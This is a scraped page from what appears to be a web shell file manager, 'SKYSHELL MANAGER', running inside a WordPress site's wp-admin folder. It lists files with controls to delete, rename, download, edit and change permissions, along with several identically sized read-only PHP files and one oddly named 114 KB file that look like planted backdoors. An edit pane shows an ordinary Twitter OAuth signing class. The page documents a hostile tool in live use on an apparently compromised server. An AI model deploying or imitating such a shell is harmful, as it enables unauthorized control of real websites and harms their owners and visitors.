📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: User.php
<?php namespace TwitterPhp\Connection; class User extends Base { /** * @var string */ private $_consumerKey; /** * @var string */ private $_consumerSecret; /** * @var string */ private $_accessToken; /** * @var string */ private $_accessTokenSecret; /** * @param string $consumerKey * @param string $consumerSecret * @param string $accessToken * @param string $accessTokenSecret */ public function __construct($consumerKey,$consumerSecret,$accessToken,$accessTokenSecret) { $this->_consumerKey = $consumerKey; $this->_consumerSecret = $consumerSecret; $this->_accessToken = $accessToken; $this->_accessTokenSecret = $accessTokenSecret; } /** * @param string $url * @param array $parameters * @param $method * @return array */ protected function _buildHeaders($url,array $parameters = null,$method) { $oauthHeaders = array( 'oauth_version' => '1.0', 'oauth_consumer_key' => $this->_consumerKey, 'oauth_nonce' => time(), 'oauth_signature_method' => 'HMAC-SHA1', 'oauth_token' => $this->_accessToken, 'oauth_timestamp' => time() ); $data = $oauthHeaders; if ($method == self::METHOD_GET) { $data = array_merge($oauthHeaders,$parameters); } $oauthHeaders['oauth_signature'] = $this->_buildOauthSignature($url,$data,$method); ksort($oauthHeaders); $oauthHeader = array(); foreach($oauthHeaders as $key => $value) { $oauthHeader[] = $key . '="' . rawurlencode($value) . '"'; } $headers[] = 'Authorization: OAuth ' . implode(', ', $oauthHeader); return $headers; } /** * @param $url * @param array $params * @param $method * @return string */ private function _buildOauthSignature($url,array $params,$method) { ksort($params); $sortedParams = array(); foreach($params as $key=>$value) { $sortedParams[] = $key . '=' . $value; } $signatureBaseString = $method . "&" . rawurlencode($url) . '&' . rawurlencode(implode('&', $sortedParams)); $compositeKey = rawurlencode($this->_consumerSecret) . '&' . rawurlencode($this->_accessTokenSecret); return base64_encode(hash_hmac('sha1', $signatureBaseString, $compositeKey, true)); } }
Save